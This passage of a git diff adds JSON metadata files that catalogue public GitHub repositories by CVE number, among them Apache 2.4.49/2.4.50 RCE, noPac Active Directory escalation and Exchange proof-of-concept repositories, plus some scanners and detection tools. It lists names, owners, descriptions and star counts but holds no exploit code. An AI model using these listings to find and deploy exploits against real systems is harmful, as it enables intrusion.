+ "updated_at": "2023-07-03T11:02:08Z",
+ "pushed_at": "2023-06-29T16:34:21Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 683184103,
+ "name": "CVE-2021-42013-EXPLOIT",
+ "full_name": "K3ysTr0K3R\/CVE-2021-42013-EXPLOIT",
+ "owner": {
+ "login": "K3ysTr0K3R",
+ "id": 70909693,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4",
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R"
+ },
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2021-42013-EXPLOIT",
+ "description": "A PoC exploit for CVE-2021-42013 - Apache 2.4.49 & 2.4.50 Remote Code Execution",
+ "fork": false,
+ "created_at": "2023-08-25T19:51:01Z",
+ "updated_at": "2023-08-25T20:00:43Z",
+ "pushed_at": "2024-01-15T18:01:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 740127524,
+ "name": "CVE-2021-42013",
+ "full_name": "imhunterand\/CVE-2021-42013",
+ "owner": {
+ "login": "imhunterand",
+ "id": 109766416,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109766416?v=4",
+ "html_url": "https:\/\/github.com\/imhunterand"
+ },
+ "html_url": "https:\/\/github.com\/imhunterand\/CVE-2021-42013",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-07T15:58:03Z",
+ "updated_at": "2024-01-07T16:07:29Z",
+ "pushed_at": "2024-01-07T16:09:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-42013",
+ "rce-exploit"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 783337932,
+ "name": "CVE-2021-42013",
+ "full_name": "BassoNicolas\/CVE-2021-42013",
+ "owner": {
+ "login": "BassoNicolas",
+ "id": 70383324,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70383324?v=4",
+ "html_url": "https:\/\/github.com\/BassoNicolas"
+ },
+ "html_url": "https:\/\/github.com\/BassoNicolas\/CVE-2021-42013",
+ "description": "CVE-2021-42013 Vulnerability Scanner This Python script checks for the Remote Code Execution (RCE) vulnerability (CVE-2021-42013) in Apache 2.4.50. ",
+ "fork": false,
+ "created_at": "2024-04-07T16:04:06Z",
+ "updated_at": "2024-04-28T05:01:30Z",
+ "pushed_at": "2024-04-07T17:15:24Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-4204.json b/2021/CVE-2021-4204.json
new file mode 100644
index 0000000000..7ed632d06b
--- /dev/null
+++ b/2021/CVE-2021-4204.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 463038208,
+ "name": "CVE-2021-4204",
+ "full_name": "tr3ee\/CVE-2021-4204",
+ "owner": {
+ "login": "tr3ee",
+ "id": 26628940,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26628940?v=4",
+ "html_url": "https:\/\/github.com\/tr3ee"
+ },
+ "html_url": "https:\/\/github.com\/tr3ee\/CVE-2021-4204",
+ "description": "CVE-2021-4204: Linux Kernel eBPF Local Privilege Escalation",
+ "fork": false,
+ "created_at": "2022-02-24T06:43:56Z",
+ "updated_at": "2024-02-23T20:35:04Z",
+ "pushed_at": "2022-03-19T06:32:50Z",
+ "stargazers_count": 60,
+ "watchers_count": 60,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 60,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42063.json b/2021/CVE-2021-42063.json
new file mode 100644
index 0000000000..7e7e669b2f
--- /dev/null
+++ b/2021/CVE-2021-42063.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 792995989,
+ "name": "CVE-2021-42063",
+ "full_name": "Cappricio-Securities\/CVE-2021-42063",
+ "owner": {
+ "login": "Cappricio-Securities",
+ "id": 102907425,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4",
+ "html_url": "https:\/\/github.com\/Cappricio-Securities"
+ },
+ "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2021-42063",
+ "description": "SAP Knowledge Warehouse <=7.5.0 - Cross-Site Scripting",
+ "fork": false,
+ "created_at": "2024-04-28T06:09:14Z",
+ "updated_at": "2024-05-28T06:26:47Z",
+ "pushed_at": "2024-06-21T06:25:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "bugbounty",
+ "bugbounty-tools",
+ "cve-2021-42063",
+ "vapt",
+ "xss",
+ "xss-detection"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42071.json b/2021/CVE-2021-42071.json
new file mode 100644
index 0000000000..a3b5127d35
--- /dev/null
+++ b/2021/CVE-2021-42071.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 417560973,
+ "name": "CVE-2021-42071",
+ "full_name": "adubaldo\/CVE-2021-42071",
+ "owner": {
+ "login": "adubaldo",
+ "id": 17628687,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17628687?v=4",
+ "html_url": "https:\/\/github.com\/adubaldo"
+ },
+ "html_url": "https:\/\/github.com\/adubaldo\/CVE-2021-42071",
+ "description": "In Visual Tools DVR VX16 4.2.28.0, an unauthenticated attacker can achieve remote command execution via shell metacharacters in the cgi-bin\/slogin\/login.py User-Agent HTTP header.",
+ "fork": false,
+ "created_at": "2021-10-15T16:08:16Z",
+ "updated_at": "2021-10-15T16:08:16Z",
+ "pushed_at": "2021-10-15T16:08:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42171.json b/2021/CVE-2021-42171.json
new file mode 100644
index 0000000000..1f8ec37e4d
--- /dev/null
+++ b/2021/CVE-2021-42171.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 411900067,
+ "name": "CVE-2021-42171",
+ "full_name": "minhnq22\/CVE-2021-42171",
+ "owner": {
+ "login": "minhnq22",
+ "id": 19742808,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19742808?v=4",
+ "html_url": "https:\/\/github.com\/minhnq22"
+ },
+ "html_url": "https:\/\/github.com\/minhnq22\/CVE-2021-42171",
+ "description": "File upload to Remote Code Execution on Zenario CMS 9.0.54156",
+ "fork": false,
+ "created_at": "2021-09-30T02:44:19Z",
+ "updated_at": "2022-04-03T03:22:30Z",
+ "pushed_at": "2023-06-22T06:27:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42183.json b/2021/CVE-2021-42183.json
new file mode 100644
index 0000000000..51fb956a25
--- /dev/null
+++ b/2021/CVE-2021-42183.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 488989628,
+ "name": "CVE-2021-42183",
+ "full_name": "0xRaw\/CVE-2021-42183",
+ "owner": {
+ "login": "0xRaw",
+ "id": 76697978,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76697978?v=4",
+ "html_url": "https:\/\/github.com\/0xRaw"
+ },
+ "html_url": "https:\/\/github.com\/0xRaw\/CVE-2021-42183",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-05-05T13:45:43Z",
+ "updated_at": "2024-04-28T07:48:25Z",
+ "pushed_at": "2024-04-28T07:48:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42205.json b/2021/CVE-2021-42205.json
new file mode 100644
index 0000000000..d228dfccc8
--- /dev/null
+++ b/2021/CVE-2021-42205.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 584184646,
+ "name": "CVE-2021-42205",
+ "full_name": "gmh5225\/CVE-2021-42205",
+ "owner": {
+ "login": "gmh5225",
+ "id": 13917777,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4",
+ "html_url": "https:\/\/github.com\/gmh5225"
+ },
+ "html_url": "https:\/\/github.com\/gmh5225\/CVE-2021-42205",
+ "description": "ELAN Miniport touchpad Windows driver before 24.21.51.2, as used in PC hardware from multiple manufacturers, allows local users to cause a system crash by sending a certain IOCTL request, because that request is handled twice. CVE project by @Sn0wAlice",
+ "fork": false,
+ "created_at": "2023-01-01T18:30:21Z",
+ "updated_at": "2023-02-20T12:38:17Z",
+ "pushed_at": "2022-12-28T11:30:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42230.json b/2021/CVE-2021-42230.json
new file mode 100644
index 0000000000..9c9b0524ce
--- /dev/null
+++ b/2021/CVE-2021-42230.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 433970810,
+ "name": "CVE-2021-42230-Seowon-130-SLC-router-queriesCnt-Remote-Code-Execution-Unauthenticated",
+ "full_name": "TAPESH-TEAM\/CVE-2021-42230-Seowon-130-SLC-router-queriesCnt-Remote-Code-Execution-Unauthenticated",
+ "owner": {
+ "login": "TAPESH-TEAM",
+ "id": 83407483,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83407483?v=4",
+ "html_url": "https:\/\/github.com\/TAPESH-TEAM"
+ },
+ "html_url": "https:\/\/github.com\/TAPESH-TEAM\/CVE-2021-42230-Seowon-130-SLC-router-queriesCnt-Remote-Code-Execution-Unauthenticated",
+ "description": "Seowon 130-SLC router - 'queriesCnt' Remote Code Execution (Unauthenticated)",
+ "fork": false,
+ "created_at": "2021-12-01T20:12:56Z",
+ "updated_at": "2024-01-07T10:40:28Z",
+ "pushed_at": "2022-04-16T23:46:59Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42237.json b/2021/CVE-2021-42237.json
new file mode 100644
index 0000000000..c2ad327386
--- /dev/null
+++ b/2021/CVE-2021-42237.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 448464922,
+ "name": "CVE-2021-42237",
+ "full_name": "ItsIgnacioPortal\/CVE-2021-42237",
+ "owner": {
+ "login": "ItsIgnacioPortal",
+ "id": 46269721,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46269721?v=4",
+ "html_url": "https:\/\/github.com\/ItsIgnacioPortal"
+ },
+ "html_url": "https:\/\/github.com\/ItsIgnacioPortal\/CVE-2021-42237",
+ "description": "An exploit\/PoC for CVE-2021-42237",
+ "fork": false,
+ "created_at": "2022-01-16T05:22:30Z",
+ "updated_at": "2024-06-25T09:27:20Z",
+ "pushed_at": "2022-01-16T05:40:17Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 509039142,
+ "name": "CVE-2021-42237-SiteCore-XP",
+ "full_name": "vesperp\/CVE-2021-42237-SiteCore-XP",
+ "owner": {
+ "login": "vesperp",
+ "id": 28191544,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28191544?v=4",
+ "html_url": "https:\/\/github.com\/vesperp"
+ },
+ "html_url": "https:\/\/github.com\/vesperp\/CVE-2021-42237-SiteCore-XP",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-06-30T10:44:23Z",
+ "updated_at": "2023-03-18T12:11:55Z",
+ "pushed_at": "2022-06-30T10:47:27Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 539971933,
+ "name": "SiteCore-RCE-Detection",
+ "full_name": "crankyyash\/SiteCore-RCE-Detection",
+ "owner": {
+ "login": "crankyyash",
+ "id": 61792333,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61792333?v=4",
+ "html_url": "https:\/\/github.com\/crankyyash"
+ },
+ "html_url": "https:\/\/github.com\/crankyyash\/SiteCore-RCE-Detection",
+ "description": "For detection of sitecore RCE - CVE-2021-42237",
+ "fork": false,
+ "created_at": "2022-09-22T12:32:11Z",
+ "updated_at": "2022-09-22T13:25:33Z",
+ "pushed_at": "2022-09-22T13:50:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42261.json b/2021/CVE-2021-42261.json
new file mode 100644
index 0000000000..fdc430fdd0
--- /dev/null
+++ b/2021/CVE-2021-42261.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 416296729,
+ "name": "CVE-2021-42261",
+ "full_name": "jet-pentest\/CVE-2021-42261",
+ "owner": {
+ "login": "jet-pentest",
+ "id": 71512502,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71512502?v=4",
+ "html_url": "https:\/\/github.com\/jet-pentest"
+ },
+ "html_url": "https:\/\/github.com\/jet-pentest\/CVE-2021-42261",
+ "description": "CVE-2021-42261",
+ "fork": false,
+ "created_at": "2021-10-12T10:50:01Z",
+ "updated_at": "2022-11-09T18:14:02Z",
+ "pushed_at": "2021-10-12T10:55:16Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42278.json b/2021/CVE-2021-42278.json
new file mode 100644
index 0000000000..5d6196e5aa
--- /dev/null
+++ b/2021/CVE-2021-42278.json
@@ -0,0 +1,159 @@
+[
+ {
+ "id": 437314230,
+ "name": "sam-the-admin",
+ "full_name": "safebuffer\/sam-the-admin",
+ "owner": {
+ "login": "safebuffer",
+ "id": 20618414,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20618414?v=4",
+ "html_url": "https:\/\/github.com\/safebuffer"
+ },
+ "html_url": "https:\/\/github.com\/safebuffer\/sam-the-admin",
+ "description": "Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user ",
+ "fork": false,
+ "created_at": "2021-12-11T15:10:30Z",
+ "updated_at": "2024-06-25T15:01:40Z",
+ "pushed_at": "2022-07-10T22:23:13Z",
+ "stargazers_count": 965,
+ "watchers_count": 965,
+ "has_discussions": false,
+ "forks_count": 190,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "active-directory",
+ "exploitation",
+ "redteam",
+ "s4u2self"
+ ],
+ "visibility": "public",
+ "forks": 190,
+ "watchers": 965,
+ "score": 0,
+ "subscribers_count": 26
+ },
+ {
+ "id": 437829160,
+ "name": "noPac",
+ "full_name": "Ridter\/noPac",
+ "owner": {
+ "login": "Ridter",
+ "id": 6007471,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6007471?v=4",
+ "html_url": "https:\/\/github.com\/Ridter"
+ },
+ "html_url": "https:\/\/github.com\/Ridter\/noPac",
+ "description": "Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user ",
+ "fork": false,
+ "created_at": "2021-12-13T10:28:12Z",
+ "updated_at": "2024-06-25T13:47:35Z",
+ "pushed_at": "2023-01-29T03:31:27Z",
+ "stargazers_count": 744,
+ "watchers_count": 744,
+ "has_discussions": false,
+ "forks_count": 119,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 119,
+ "watchers": 744,
+ "score": 0,
+ "subscribers_count": 13
+ },
+ {
+ "id": 437924403,
+ "name": "noPac",
+ "full_name": "waterrr\/noPac",
+ "owner": {
+ "login": "waterrr",
+ "id": 15225499,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15225499?v=4",
+ "html_url": "https:\/\/github.com\/waterrr"
+ },
+ "html_url": "https:\/\/github.com\/waterrr\/noPac",
+ "description": "Exploiting CVE-2021-42278 and CVE-2021-42287",
+ "fork": false,
+ "created_at": "2021-12-13T15:24:59Z",
+ "updated_at": "2024-03-05T09:34:17Z",
+ "pushed_at": "2021-12-13T15:40:14Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 438053162,
+ "name": "Pachine",
+ "full_name": "ly4k\/Pachine",
+ "owner": {
+ "login": "ly4k",
+ "id": 53348818,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53348818?v=4",
+ "html_url": "https:\/\/github.com\/ly4k"
+ },
+ "html_url": "https:\/\/github.com\/ly4k\/Pachine",
+ "description": "Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)",
+ "fork": false,
+ "created_at": "2021-12-13T23:15:05Z",
+ "updated_at": "2024-06-21T00:09:42Z",
+ "pushed_at": "2022-01-13T12:35:19Z",
+ "stargazers_count": 269,
+ "watchers_count": 269,
+ "has_discussions": false,
+ "forks_count": 38,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-42278"
+ ],
+ "visibility": "public",
+ "forks": 38,
+ "watchers": 269,
+ "score": 0,
+ "subscribers_count": 7
+ },
+ {
+ "id": 442163896,
+ "name": "noPac-detection",
+ "full_name": "cybersecurityworks553\/noPac-detection",
+ "owner": {
+ "login": "cybersecurityworks553",
+ "id": 63910792,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63910792?v=4",
+ "html_url": "https:\/\/github.com\/cybersecurityworks553"
+ },
+ "html_url": "https:\/\/github.com\/cybersecurityworks553\/noPac-detection",
+ "description": "Detection script for CVE-2021-42278 and CVE-2021-42287",
+ "fork": false,
+ "created_at": "2021-12-27T13:10:45Z",
+ "updated_at": "2022-03-30T06:49:25Z",
+ "pushed_at": "2021-12-27T13:27:33Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42287.json b/2021/CVE-2021-42287.json
new file mode 100644
index 0000000000..e3162ca594
--- /dev/null
+++ b/2021/CVE-2021-42287.json
@@ -0,0 +1,152 @@
+[
+ {
+ "id": 437370545,
+ "name": "noPac",
+ "full_name": "cube0x0\/noPac",
+ "owner": {
+ "login": "cube0x0",
+ "id": 39370848,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39370848?v=4",
+ "html_url": "https:\/\/github.com\/cube0x0"
+ },
+ "html_url": "https:\/\/github.com\/cube0x0\/noPac",
+ "description": "CVE-2021-42287\/CVE-2021-42278 Scanner & Exploiter.",
+ "fork": false,
+ "created_at": "2021-12-11T19:27:30Z",
+ "updated_at": "2024-06-25T06:12:59Z",
+ "pushed_at": "2021-12-16T09:50:15Z",
+ "stargazers_count": 1307,
+ "watchers_count": 1307,
+ "has_discussions": false,
+ "forks_count": 319,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 319,
+ "watchers": 1307,
+ "score": 0,
+ "subscribers_count": 27
+ },
+ {
+ "id": 437991499,
+ "name": "Invoke-noPac",
+ "full_name": "ricardojba\/Invoke-noPac",
+ "owner": {
+ "login": "ricardojba",
+ "id": 4868297,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4868297?v=4",
+ "html_url": "https:\/\/github.com\/ricardojba"
+ },
+ "html_url": "https:\/\/github.com\/ricardojba\/Invoke-noPac",
+ "description": ".Net Assembly loader for the [CVE-2021-42287 - CVE-2021-42278] Scanner & Exploit noPac",
+ "fork": false,
+ "created_at": "2021-12-13T19:01:18Z",
+ "updated_at": "2024-03-05T13:05:42Z",
+ "pushed_at": "2023-02-16T10:45:19Z",
+ "stargazers_count": 59,
+ "watchers_count": 59,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 59,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 445506092,
+ "name": "NoPacScan",
+ "full_name": "knightswd\/NoPacScan",
+ "owner": {
+ "login": "knightswd",
+ "id": 34396229,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34396229?v=4",
+ "html_url": "https:\/\/github.com\/knightswd"
+ },
+ "html_url": "https:\/\/github.com\/knightswd\/NoPacScan",
+ "description": "NoPacScan is a CVE-2021-42287\/CVE-2021-42278 Scanner,it scan for more domain controllers than other script",
+ "fork": false,
+ "created_at": "2022-01-07T11:59:55Z",
+ "updated_at": "2024-06-06T06:52:07Z",
+ "pushed_at": "2022-02-17T04:12:08Z",
+ "stargazers_count": 85,
+ "watchers_count": 85,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 85,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 476650535,
+ "name": "Invoke-sAMSpoofing",
+ "full_name": "XiaoliChan\/Invoke-sAMSpoofing",
+ "owner": {
+ "login": "XiaoliChan",
+ "id": 30458572,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30458572?v=4",
+ "html_url": "https:\/\/github.com\/XiaoliChan"
+ },
+ "html_url": "https:\/\/github.com\/XiaoliChan\/Invoke-sAMSpoofing",
+ "description": "CVE-2021-42287\/CVE-2021-42278 exploits in powershell",
+ "fork": false,
+ "created_at": "2022-04-01T09:10:14Z",
+ "updated_at": "2023-10-13T08:22:32Z",
+ "pushed_at": "2022-04-04T08:33:41Z",
+ "stargazers_count": 37,
+ "watchers_count": 37,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 37,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 581054615,
+ "name": "noPac",
+ "full_name": "TryA9ain\/noPac",
+ "owner": {
+ "login": "TryA9ain",
+ "id": 51145610,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51145610?v=4",
+ "html_url": "https:\/\/github.com\/TryA9ain"
+ },
+ "html_url": "https:\/\/github.com\/TryA9ain\/noPac",
+ "description": "CVE-2021-42287\/CVE-2021-42278 Exploiter",
+ "fork": false,
+ "created_at": "2022-12-22T06:39:07Z",
+ "updated_at": "2024-01-25T01:06:20Z",
+ "pushed_at": "2023-01-12T09:05:52Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42292.json b/2021/CVE-2021-42292.json
new file mode 100644
index 0000000000..e7607ea47b
--- /dev/null
+++ b/2021/CVE-2021-42292.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 426216342,
+ "name": "CVE-2021-42292",
+ "full_name": "corelight\/CVE-2021-42292",
+ "owner": {
+ "login": "corelight",
+ "id": 21672558,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4",
+ "html_url": "https:\/\/github.com\/corelight"
+ },
+ "html_url": "https:\/\/github.com\/corelight\/CVE-2021-42292",
+ "description": "A Zeek package to detect CVE-2021-42292, a Microsoft Excel local privilege escalation exploit.",
+ "fork": false,
+ "created_at": "2021-11-09T12:14:45Z",
+ "updated_at": "2024-01-31T11:33:43Z",
+ "pushed_at": "2021-11-11T01:22:24Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 7
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-42321.json b/2021/CVE-2021-42321.json
new file mode 100644
index 0000000000..3b894a46d8
--- /dev/null
+++ b/2021/CVE-2021-42321.json
@@ -0,0 +1,122 @@
+[
+ {
+ "id": 430932973,
+ "name": "CVE-2021-42321",
+ "full_name": "DarkSprings\/CVE-2021-42321",
+ "owner": {
+ "login": "DarkSprings",
+ "id": 90366126,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90366126?v=4",
+ "html_url": "https:\/\/github.com\/DarkSprings"
+ },
+ "html_url": "https:\/\/github.com\/DarkSprings\/CVE-2021-42321",
+ "description": "Microsoft Exchange Server Poc",
+ "fork": false,
+ "created_at": "2021-11-23T02:26:26Z",
+ "updated_at": "2024-03-21T19:02:02Z",
+ "pushed_at": "2021-11-23T02:33:47Z",
+ "stargazers_count": 85,
+ "watchers_count": 85,
+ "has_discussions": false,
+ "forks_count": 34,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 34,
+ "watchers": 85,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 444977303,
+ "name": "testanull-CVE-2021-42321_poc.py",
+ "full_name": "timb-machine-mirrors\/testanull-CVE-2021-42321_poc.py",
+ "owner": {
+ "login": "timb-machine-mirrors",
+ "id": 49810875,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49810875?v=4",
+ "html_url": "https:\/\/github.com\/timb-machine-mirrors"
+ },
+ "html_url": "https:\/\/github.com\/timb-machine-mirrors\/testanull-CVE-2021-42321_poc.py",
+ "description": "Clone from gist",
+ "fork": false,
+ "created_at": "2022-01-05T23:15:55Z",
+ "updated_at": "2023-04-08T20:14:09Z",
+ "pushed_at": "2022-01-05T23:16:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
